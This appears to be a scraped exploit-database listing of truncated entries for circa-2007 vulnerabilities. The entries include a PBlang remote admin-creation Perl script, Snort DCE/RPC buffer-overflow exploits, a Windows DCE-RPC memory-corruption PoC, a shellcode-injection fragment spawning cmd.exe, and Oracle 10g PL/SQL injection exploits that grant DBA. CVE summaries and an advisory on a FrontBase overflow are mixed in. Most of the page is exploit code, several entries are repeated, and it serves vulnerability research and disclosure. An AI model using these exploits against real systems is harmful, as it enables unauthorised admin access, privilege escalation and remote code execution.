PBlang <= 4.66z Remote Create Admin Exploit

Exploit for unknown platform in category web applications =========================================== PBlang new or die; $cookiejar = HTTP::Cookies-new; $xpl-cookiejar $cookiejar ; register $reg = $xpl-post$url.'register.php?reg=2', Content = "user" = $uname, "pass" = $passwd, "pass2" = $passwd,...

PBlang 4.66z - Remote Create Admin

!/usr/bin/perl PBlang 4.66z Create Admin Exploit this exploit register a user with admin access Coded & Discovered By Hessam-x / Hessamx-at-Hessamx.net use IO::Socket; use LWP::UserAgent; use HTTP::Cookies; $host = $ARGV0; $uname = $ARGV1; $passwd = $ARGV2; $url = "http://".$host; print q PBLANG...

FrontBase关系数据库服务器create procedure远程栈溢出漏洞

FrontBase是一款企业级的关系数据库服务器。 FrontBase在创建存储过程时存在栈溢出漏洞，允许攻击者获得NT AUTHORITY\SYSTEM或root用户权限。 如果攻击者通过“create procedure” SQL语句传送了超长参数的话，就可以触发这个溢出，导致内存破坏。例如，以下SQL语句： create procedure "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa...

CVE-2007-1511

Buffer overflow in FrontBase Relational Database Server 4.2.7 and earlier allows remote authenticated users, with privileges for creating a stored procedure, to execute arbitrary code via a CREATE PROCEDURE request with a long procedure name...

CVE-2007-1511

Buffer overflow in FrontBase Relational Database Server 4.2.7 and earlier allows remote authenticated users, with privileges for creating a stored procedure, to execute arbitrary code via a CREATE PROCEDURE request with a long procedure name...

oracle 10g (PROCESS_DUP_HANDLE) Local Privilege Elevation (win32)-vulnerability warning-the black bar safety net

include windows. h include stdio. h BOOL InjectShellcodeDWORD oldEIP,CHAR oSID HMODULE hKernel; FARPROC pCreateProc; LPSTR sCommand="cmd.exe"; DWORD dwStrLen; CHAR buff1 0 0; dwStrLen=strlensCommand; hKernel=LoadLibrary"Kernel32.dll"; pCreateProc=GetProcAddresshKernel,"CreateProcessA"; strcpybuff...

Microsoft Windows - DCE-RPC svcctl ChangeServiceConfig2A() Memory Corruption

!/usr/bin/python MS Windows DCE-RPC svcctl ChangeServiceConfig2A 0day Memory Corruption PoC Exploit Bug discovered by Krystian Kloskowski h07 Tested on Windows 2000 SP4 Polish all patches Requires.. - Impacket : http://oss.coresecurity.com/projects/impacket.html - PyCrypto :...

PT-2007-1419 · Oracle · Oracle Database Server

Name of the Vulnerable Software and Affected Versions: Oracle Database Server affected versions not specified Description: The issue allows remote authenticated users to read and modify arbitrary files via full filepaths to utl file functions such as utl file.put line and utl file.get line when u...

Snort 2.6.1 - DCE/RPC Preprocessor Remote Buffer Overflow

!/usr/bin/python Snort DCE/RPC Preprocessor Buffer Overflow Command Execution Version Author: Trirat Puttaraksa http://sf-freedom.blogspot.com For educational purpose only This exploit call calc.exe on Windows XP SP2 + Snort 2.6.1 Note: this exploit use Scapy http://www.secdev.org/projects/scapy/...

Snort 2.6.1 - DCERPC Preprocessor Remote Buffer Overflow

Snort 2.6.1 - DCERPC Preprocessor Remote Buffer Overflow !/usr/bin/python Snort DCE/RPC Preprocessor Buffer Overflow Command Execution Version Author: Trirat Puttaraksa http://sf-freedom.blogspot.com For educational purpose only This exploit call calc.exe on Windows XP SP2 + Snort 2.6.1 Note: thi...

Snort 2.6.1 - DCE/RPC Preprocessor Remote Buffer Overflow (Denial of Service) (PoC)

!/usr/bin/python Snort DCE/RPC Preprocessor Buffer Overflow DoS Author: Trirat Puttaraksa http://sf-freedom.blogspot.com For educational purpose only This exploit just crash Snort 2.6.1 on Fedora Core 4. However, Code Execution may be possible, but I have no time to make it : I will post the...

Snort 2.6.1 DCE/RPC Preprocessor Remote Buffer Overflow DoS Exploit

Exploit for multiple platform in category dos / poc =================================================================== Snort 2.6.1 DCE/RPC Preprocessor Remote Buffer Overflow DoS Exploit =================================================================== !/usr/bin/python Snort DCE/RPC Preprocess...

CVE-2007-0507

SQL injection vulnerability in the Acidfree module for Drupal before 4.6.x-1.0, and before 4.7.x-1.0 in the 4.7 series, allows remote authenticated users with "create acidfree albums" privileges to execute arbitrary SQL commands via node titles...

Oracle 10g SYS.KUPV$FT.ATTACH_JOB PL/SQL Injection Exploit

No description provided by source. / Exploit for Oracle10g R1 and R2 prior to CPU Oct 2006 Joxean Koret [email protected] Privileges needed: - EXECUTECATALOGROLE - CREATE PROCEDURE / select from userroleprivs ; CREATE OR REPLACE FUNCTION F1 RETURN NUMBER AUTHID CURRENTUSER IS PRAGMA...

Oracle 10g SYS.KUPV$FT.ATTACH_JOB PL/SQL Injection Exploit

Exploit for multiple platform in category local exploits ========================================================== Oracle 10g SYS.KUPV$FT.ATTACHJOB PL/SQL Injection Exploit ========================================================== / Exploit for Oracle10g R1 and R2 prior to CPU Oct 2006 Joxean...

Oracle 10g - SYS.KUPW$WORKER.MAIN PL SQL Injection

Oracle 10g - SYS.KUPW$WORKER.MAIN PL SQL Injection / Exploit for Oracle10g R1 and R2 prior to CPU Oct 2006 Joxean Koret Privileges needed: - CREATE SESSION - CREATE PROCEDURE / select from userroleprivs ; CREATE OR REPLACE FUNCTION F1 RETURN NUMBER AUTHID CURRENTUSER IS PRAGMA...

Oracle 10g SYS.KUPW$WORKER.MAIN PL/SQL Injection Exploit

Exploit for multiple platform in category local exploits ======================================================== Oracle 10g SYS.KUPW$WORKER.MAIN PL/SQL Injection Exploit ======================================================== / Exploit for Oracle10g R1 and R2 prior to CPU Oct 2006 Joxean Koret...

Oracle 10g - SYS.KUPV$FT.ATTACH_JOB PL SQL Injection

Oracle 10g - SYS.KUPV$FT.ATTACHJOB PL SQL Injection / Exploit for Oracle10g R1 and R2 prior to CPU Oct 2006 Joxean Koret Privileges needed: - EXECUTECATALOGROLE - CREATE PROCEDURE / select from userroleprivs ; CREATE OR REPLACE FUNCTION F1 RETURN NUMBER AUTHID CURRENTUSER IS PRAGMA...

Oracle 10g - SYS.KUPV$FT.ATTACH_JOB PL / SQL Injection

/ Exploit for Oracle10g R1 and R2 prior to CPU Oct 2006 Joxean Koret Privileges needed: - EXECUTECATALOGROLE - CREATE PROCEDURE / select from userroleprivs ; CREATE OR REPLACE FUNCTION F1 RETURN NUMBER AUTHID CURRENTUSER IS PRAGMA AUTONOMOUSTRANSACTION; BEGIN EXECUTE IMMEDIATE 'GRANT DBA TO TEST'...

Oracle 10g - SYS.DBMS_CDC_IMPDP.BUMP_SEQUENCE PL / SQL Injection

/ Exploit for Oracle10g R1 and R2 prior to CPU Oct 2006 Joxean Koret Privileges needed: - CREATE SESSION Max. Length 97. Very, very cool / select from userroleprivs ; DECLARE SEQUENCEOWNER VARCHAR2200; SEQUENCENAME VARCHAR2200; vuserid number; vcommands VARCHAR232767; NEWVALUE NUMBER; BEGIN SELEC...